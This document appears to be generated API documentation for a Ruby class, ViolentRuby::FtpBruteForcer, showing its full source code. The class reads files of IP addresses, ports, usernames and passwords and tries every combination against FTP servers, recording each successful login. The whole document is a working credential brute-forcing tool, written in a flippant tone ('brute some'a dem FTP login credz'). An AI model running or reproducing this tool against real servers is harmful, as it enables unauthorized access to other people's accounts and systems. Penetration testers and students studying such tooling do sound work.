class ViolentRuby::FtpBruteForcer

The Ftp Brute Forcer class provides a simply way to brute-force an FTP server's credentials. @author Kent 'picat' Gruber

@example Basic Usage

ftp = FtpBruteForcer.new
ftp.users     = "resources/ftp_users.txt"
ftp.passwords = "resources/ftp_passwords.txt"
ftp.ips       = "resources/ftp_ips.txt"
ftp.ports     = "resources/ftp_ports.txt"
# brue'm!
ftp.brute_force!
# => results

Attributes

ips[RW]

@attr [String] ips Path to file containing ip addresses.

passwords[RW]

@attr [String] passwords Path to file containing passwords.

ports[RW]

@attr [String] ports Path to file containing ports.

users[RW]

@attr [String] users Path to file containing users.

Public Class Methods

new(args = {}) click to toggle source

Create a new Ftp Brute Forcer.

@param [Hash] args The options to create a new Ftp Brute Forcer. @param args [String] :users The path to a file of users to attempt. @param args [String] :passwords The path to a file of passwords to attempt. @param args [String] :ips The path to a file of server ips to attempt to connect to. @param args [String] :ports The path to a file of service ports to attempt to connect to.

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 35
def initialize(args = {})
        @users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
        @passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
        @ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
        @ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
        @ftp       = Net::FTP.new
end

Public Instance Methods

able_to_login?(args = {}) click to toggle source

Check if a given IP address, port, username and passwords are correct to login. @see brute_force @param [Hash] args @param args [String] :ip @param args [String] :port @param args [String] :username @param args [String] :password @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 102
def able_to_login?(args = {})
        @ftp.connect(args[:ip], args[:port])
        @ftp.login(args[:username], args[:password]) 
        if @ftp.welcome == "230 Login successful.\n"
                @ftp.close
                return true
        end
        ftp_login.quit
        false
rescue
        false
end
brute_force(args = {}) { |result| ... } click to toggle source

Brute force some'a dem FTP login credz.

@param [Hash] args The options to brute force. @param args [String] :users The path to a file of users to attempt. @param args [String] :passwords The path to a file of passwords to attempt. @param args [String] :ips The path to a file of server ips to attempt to connect to. @param args [String] :ports The path to a file of service ports to attempt to connect to.

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 50
def brute_force(args = {})
        meets_our_requirements?(args) 
        results   = []
        ips       = args[:ips]        || @ips 
        ports     = args[:ports]      || @ports
        users     = args[:users]      || @users
        passwords = args[:passwords]  || @passwords
        iterate_over(ips).each do |ip|
                iterate_over(ports).each do |port|
                        next unless connectable?(ip: ip, port: port)
                        iterate_over(users).each do |user|
                                iterate_over(passwords).each do |password|
                                        if able_to_login?(ip: ip, port: port, username: user, password: password)
                                                result = format_result("SUCCESS", ip, port, user, password)
                                        else
                                                result = format_result("FAILURE", ip, port, user, password)
                                        end
                                        results << result
                                        yield result if block_given?
                                end
                        end
                end
        end
        results
end
Also aliased as: brute_force!
brute_force!(args = {})

brute_force! is the same as brute_force

Alias for: brute_force
connectable?(args = {}) click to toggle source

Check if a given IP address and port can connceted to. @see brute_force @param [Hash] args the options to brute force. @param args [String] :ip The ip address to attempt to connect to. @param args [String] :port The port to attempt to connect to. @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 85
def connectable?(args = {})
        @ftp.connect(args[:ip], args[:port])
        return true if @ftp.last_response_code == "220"
        false
rescue
        false
end

Private Instance Methods

format_result(type, ip, port, user, password) click to toggle source

@api private Format the results from brute force attempts. @see brute_force @param [String] type @param [String] ip @param [Integer] port @param [String] user @param [String] password @return [Hash]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 127
def format_result(type, ip, port, user, password)
        { time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
end
ips?(args = {}) click to toggle source

@api private Check if the given arguments contains ips, or has been set. @see meets_our_requirements? @param [Hash] args the options to brute force. @param args [String] :ips @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 163
def ips?(args = {})
        return true if args[:ips] || @ips
        false 
end
iterate_over(file) click to toggle source

@api private Iterate over each line in a file, stripping each line as it goes. @see File @param [String] file @return [Enumerator]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 136
def iterate_over(file)
        File.foreach(file).map(&:strip)
end
meets_our_requirements?(args = {}) click to toggle source

@api private Check if the given arguments contain an ip, port, password and user files. @see brute_force @param [Hash] args the options to brute force. @param args [String] :ips @param args [String] :ports @param args [String] :passwords @param args [String] :users @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 149
def meets_our_requirements?(args = {})
        raise "No ip addresses to connect to." unless ips?(args)
        raise "No ports to connect to."                       unless ports?(args)
        raise "No passwords to try."                                          unless passwords?(args)
        raise "No users to try."                                                      unless users?(args)
        true
end
passwords?(args = {}) click to toggle source

@api private Check if the given arguments contains passwords, or has been set. @see meets_our_requirements? @param [Hash] args @param args [String] :passwords @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 174
def passwords?(args = {})
        return true if args[:passwords] || @passwords
        false
end
ports?(args = {}) click to toggle source

@api private Check if the given arguments contains ports, or has been set. @see meets_our_requirements? @param [Hash] args @param args [String] :ports @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 189
def ports?(args = {})
        return true if args[:ports] || @ports
        false
end
users?(args = {}) click to toggle source

@api private Check if the given arguments contains users, or has been set. @see meets_our_requirements? @param [Hash] args @param args [String] :users @return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 200
def users?(args = {})
        return true if args[:users] || @users
        false
end